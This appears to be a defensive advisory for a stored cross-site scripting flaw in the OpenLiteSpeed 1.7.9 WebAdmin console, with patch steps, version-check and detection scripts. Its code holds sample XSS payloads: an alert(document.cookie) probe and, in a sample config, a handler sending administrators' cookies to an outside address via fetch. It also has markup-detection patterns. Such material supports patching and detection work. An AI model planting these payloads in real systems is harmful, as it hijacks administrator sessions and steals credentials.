CVE-2021-47855
📋 TL;DR
OpenLiteSpeed 1.7.9 has a stored cross-site scripting flaw in the WebAdmin console: the Notes field of a listener configuration is saved as entered and later rendered into the admin page without escaping. When an administrator clicks the Default Icon for that listener, the stored script runs in the administrator's browser session, which can be used to hijack that session and change server configuration. Version 1.7.9 is the only release the CVE names as affected.
💻 Affected Systems
- OpenLiteSpeed 1.7.9 (WebAdmin console, listener configuration)
⚠️ Manual Verification Required
The NVD record for this CVE carries no machine-readable affected-version range, so scanners that match on version data will not flag this on their own.
Why? The CVE description names 1.7.9 in prose only; no structured version ranges were published by the vendor or NVD. The fix shipped in 1.7.10, so check the installed version by hand (see How to Verify below).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete administrative account takeover leading to server compromise, data theft, or deployment of backdoors.
Likely Case
Session hijacking of administrator accounts, unauthorized configuration changes, or credential theft.
If Mitigated
Limited if the WebAdmin console is reachable only from trusted addresses, each administrator uses a distinct console account so that a planted note is attributable, and administrators log out of the console rather than leaving sessions open.
🎯 Exploit Status
Planting the payload requires an authenticated WebAdmin session, so this is not an initial-access vector: the realistic attacker is someone who already holds, or once held, console access, or a console user with less trust than the administrator who later views the listener. Because the payload is stored in the configuration, it fires in whichever administrator's browser clicks the Default Icon, and it remains in place even after the planter's own credentials are rotated.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.7.10 or later
Vendor Advisory: https://openlitespeed.org/news/openlitespeed-1-7-10-released/
Restart Required: Yes
Instructions:
1. Back up the current configuration (/usr/local/lsws/conf and /usr/local/lsws/admin/conf in a default install).
2. Obtain OpenLiteSpeed 1.7.10 or later from openlitespeed.org, or through the package repository you installed from.
3. Stop the OpenLiteSpeed service.
4. Install the new version.
5. Start the OpenLiteSpeed service.
6. Verify the version with /usr/local/lsws/bin/lshttpd -v (the shorter form litespeed -v assumes the binary is on PATH under that name).
7. Audit existing listener Notes values: the upgrade fixes the rendering, but a payload already stored in the configuration may still be there and should be removed.
🔧 Temporary Workarounds
Input Sanitization
The Notes field is rendered by vendor code in the WebAdmin console, so there is no setting that turns escaping on; sanitizing it properly means changing the WebAdmin code, which is what the 1.7.10 release does. As an interim control, review the stored Notes value of every listener for HTML or script fragments and replace anything that is not plain text.
# No direct command - requires code modification; the stored values can be reviewed in the configuration file
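As an added example (not OpenLiteSpeed code), here is a minimal model of the bug class and of the escaping a sanitizing fix must apply: a stored note rendered straight into admin HTML, beside the hardened rendering. The HTML fragment and the payload are constructed stand-ins for the WebAdmin page, and the check function is the kind of assertion used after a manual probe.

```python
"""Model of a stored-XSS Notes field: the saved note echoed into admin HTML
unescaped, beside the hardened rendering.  Added example, not OpenLiteSpeed
code; the HTML fragment and the payload are constructed stand-ins."""
import html

# Constructed payload of the kind a Notes field could carry: it closes the
# attribute it lands in, then injects a tag with an event handler.
PAYLOAD = '"><img src=x onerror=alert(document.cookie)>'

# Stand-in for the dashboard markup: the note lands in an attribute and in a body.
TEMPLATE = '<a class="icon" title="{note}">Default</a><div class="note">{note}</div>'


def render_unescaped(note: str) -> str:
    """Vulnerable: the stored note is substituted straight into the page,
    into both an attribute value and an element body."""
    return TEMPLATE.format(note=note)


def render_escaped(note: str) -> str:
    """Hardened: html.escape(quote=True) turns < > & " ' into entities, so the
    value can neither close the title attribute nor open a new tag."""
    return TEMPLATE.format(note=html.escape(note, quote=True))


def note_breaks_out(rendered: str, note: str) -> bool:
    """Check used after a manual probe: does the raw note survive into the
    page verbatim?  True means attacker-controlled tag or attribute
    boundaries reached the browser."""
    return note in rendered


def listener_page(notes: dict, escaped: bool) -> str:
    """Round trip from the stored configuration back to an admin's browser:
    one row per listener, as a dashboard listing the Default Icon would."""
    render = render_escaped if escaped else render_unescaped
    return "\n".join(
        f"<tr><td>{html.escape(name)}</td><td>{render(note)}</td></tr>"
        for name, note in notes.items()
    )


if __name__ == "__main__":
    stored = {"Default": "public HTTP", "Example": PAYLOAD}
    print(listener_page(stored, escaped=False))
    print(listener_page(stored, escaped=True))
```

The point of `quote=True` is the attribute context: escaping only angle brackets leaves `"` free to terminate `title="..."`, which is exactly the boundary the constructed payload attacks.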
Access Restriction
Restrict WebAdmin console access to trusted source addresses only.
# Allow TCP/7080 (the default WebAdmin port) only from trusted administrator addresses on the host firewall, or bind the admin listener to 127.0.0.1 and reach it over an SSH tunnel. This does not remove a note that is already stored; it limits who can plant one and whose browser can be targeted.
🧯 If You Can't Patch
- Review the stored Notes value of each listener for markup (angle brackets, javascript: URLs, on*= handlers) and clear anything that is not plain text; the stored value is what fires, so removing it removes the exposure until the next edit.
- Do not count on a Content Security Policy as an interim control: a policy strict enough to block an injected inline handler usually breaks admin consoles that rely on inline scripts of their own, so test the console under the policy before relying on it.
🔍 How to Verify
Check if Vulnerable:
Read the installed version from the binary or from the WebAdmin dashboard. The CVE names 1.7.9 and the fix is 1.7.10, so treat 1.7.9 as vulnerable and anything else below 1.7.10 as unverified. Compare versions numerically, not as strings: "1.7.10" sorts before "1.7.9" lexically.
Check Version:
/usr/local/lsws/bin/lshttpd -v
The shorter form litespeed -v works only if the binary is on PATH under that name; a default install keeps it under /usr/local/lsws/bin.
Verify Fix Applied:
Confirm the reported version is 1.7.10 or later. Then, from a dedicated admin session, save a harmless probe such as <b>probe</b> in a listener's Notes field, reload the listener page and click the Default Icon: the probe must appear as literal text, not as bold, and the page source must show it escaped (&lt;b&gt;probe&lt;/b&gt;). Remove the probe afterwards.
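An added version-check helper (not from this page or from the OpenLiteSpeed project) that parses the version string and compares it numerically. It assumes `lshttpd -v` prints a line of the form `LiteSpeed/1.7.9 Open` and that the binary lives under /usr/local/lsws/bin; both are default-install conventions stated here as assumptions.

```python
"""Version check for the OpenLiteSpeed stored-XSS advisory.  Added example;
the 'LiteSpeed/x.y.z Open' output format and the binary path are assumed
default-install conventions, not something the advisory states."""
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, int, int]

FIXED_IN: Version = (1, 7, 10)     # first release the advisory calls patched
NAMED_VULNERABLE = {(1, 7, 9)}     # the only version the CVE text names

VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")


def parse_version(text: str) -> Optional[Version]:
    """Extract x.y.z from 'LiteSpeed/1.7.9 Open' (assumed lshttpd -v form) or
    from a dashboard string such as 'Version: 1.7.9'.  None if absent."""
    m = VERSION_RE.search(text)
    return tuple(int(p) for p in m.groups()) if m else None


def assess(version: Optional[Version]) -> str:
    """Classify against the advisory.  Tuples compare numerically, which is
    the point: as strings '1.7.10' < '1.7.9', and a naive string comparison
    would pass a vulnerable host."""
    if version is None:
        return "unknown"
    if version in NAMED_VULNERABLE:
        return "vulnerable"
    if version < FIXED_IN:
        return "unverified"    # older than the fix but not named by the CVE
    return "fixed"


def installed_version(binary: str = "/usr/local/lsws/bin/lshttpd") -> Optional[Version]:
    """Run the binary with -v and parse whatever it prints on either stream."""
    try:
        proc = subprocess.run([binary, "-v"], capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return None
    return parse_version(proc.stdout + proc.stderr)


if __name__ == "__main__":
    v = installed_version()
    print(".".join(map(str, v)) if v else "no version found", "->", assess(v))
```

Run it on the host as the user that can execute the binary; if it reports "unknown", fall back to the version shown on the WebAdmin dashboard and feed that string to `parse_version`.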
📡 Detection & Monitoring
Log Indicators:
- Logins to the WebAdmin console (/usr/local/lsws/admin/logs/access.log in a default install) from unexpected addresses or at unusual times
- Configuration saves (POST requests to the console) that precede a change to a listener's Notes value
- Markup in a stored Notes value in the server configuration file; the server does not log script execution in a browser, so the configuration file is where the payload itself can be found
Network Indicators:
- Outbound connections from administrators' browsers to unknown hosts shortly after using the console (cookie or token exfiltration)
- Requests to the WebAdmin port from addresses outside the trusted administrator set
SIEM Query:
source="/usr/local/lsws/admin/logs/access.log" AND method="POST" AND NOT src_ip IN (trusted administrator ranges)
Field names depend on how your SIEM parses the access log. The injected payload travels in the POST body, which the access log does not record, so search the configuration file for markup rather than expecting "script" or "onclick" to appear in log lines.
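Detection logic as an added example (not this page's query and not OpenLiteSpeed code): it scans the stored server configuration for Notes values containing markup, which is where a planted payload actually lives, and scans the WebAdmin access log for configuration POSTs from outside the trusted administrator range, which points at the actor. The `note` directive name, the default file paths and the sample config and log lines are assumptions and constructed samples, labelled as such in the code.

```python
"""Hunt for a planted Notes payload and for who could have planted it.
Added example; the 'note' directive, the default paths and the sample
config/log lines are assumptions and constructed samples, not page content."""
import ipaddress
import re
from typing import Iterable, List, Tuple

# Markup that has no business in a free-text note (case-insensitive):
# a tag opener, a javascript: URL, an on*= handler, or an HTML entity.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript\s*:|\bon[a-z]+\s*=|&#x?[0-9a-f]+;", re.I)

# Constructed fragment in the style of httpd_config.conf; 'note' is assumed
# to be the directive the WebAdmin writes the Notes field to.
SAMPLE_CONFIG = """\
listener Default {
  address                 *:8088
  secure                  0
  note                    public HTTP
  map                     Example *
}
listener Admin2 {
  address                 *:8443
  secure                  1
  note                    "><img src=x onerror=fetch('//203.0.113.5/?c='+document.cookie)>
}
"""

# Constructed WebAdmin access-log lines (combined-log style); paths are samples.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Mar/2021:09:14:02 +0000] "POST /login.php HTTP/1.1" 302 0',
    '10.0.0.5 - - [12/Mar/2021:09:15:40 +0000] "POST /view/confMgr.php?m=sl_Admin2 HTTP/1.1" 200 4182',
    '198.51.100.23 - - [12/Mar/2021:23:41:07 +0000] "POST /view/confMgr.php?m=sl_Admin2 HTTP/1.1" 200 4182',
    '198.51.100.23 - - [12/Mar/2021:23:41:09 +0000] "GET /view/confMgr.php?m=sl_Admin2 HTTP/1.1" 200 9810',
]

BLOCK_RE = re.compile(r"^(\w+)\s+(\S+)\s*\{")
NOTE_RE = re.compile(r"^note\s+(.*)$")
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+)')


def scan_config(text: str) -> List[Tuple[int, str, str]]:
    """(line_no, block, note) for every note carrying markup.  The config is
    where a stored payload lives, so this is the authoritative indicator."""
    hits, block = [], "?"
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = BLOCK_RE.match(line)
        if m:
            block = f"{m.group(1)} {m.group(2)}"
            continue
        m = NOTE_RE.match(line)
        if m and MARKUP_RE.search(m.group(1)):
            hits.append((n, block, m.group(1)))
    return hits


def scan_access_log(lines: Iterable[str],
                    trusted: Iterable[str] = ("10.0.0.0/24",)) -> List[Tuple[str, str, str]]:
    """(ip, timestamp, path) for console POSTs from outside the trusted ranges.
    POST bodies are not logged, so this finds the actor, not the payload."""
    nets = [ipaddress.ip_network(t) for t in trusted]
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, method, path = m.groups()
        if method == "POST" and not any(ipaddress.ip_address(ip) in net for net in nets):
            hits.append((ip, when, path))
    return hits


if __name__ == "__main__":
    import sys
    # Pass real files to scan a live host, e.g. (assumed default-install paths)
    # /usr/local/lsws/conf/httpd_config.conf /usr/local/lsws/admin/logs/access.log
    if len(sys.argv) == 3:
        cfg = open(sys.argv[1]).read()
        log = open(sys.argv[2]).read().splitlines()
    else:
        cfg, log = SAMPLE_CONFIG, SAMPLE_ACCESS_LOG
    for hit in scan_config(cfg):
        print("config:", hit)
    for hit in scan_access_log(log):
        print("log:", hit)
```

Correlate the two outputs by time: a markup hit in the configuration is the finding, and the nearest preceding console POST tells you which session wrote it. Tune `trusted` to the real administrator ranges before running it over a production log.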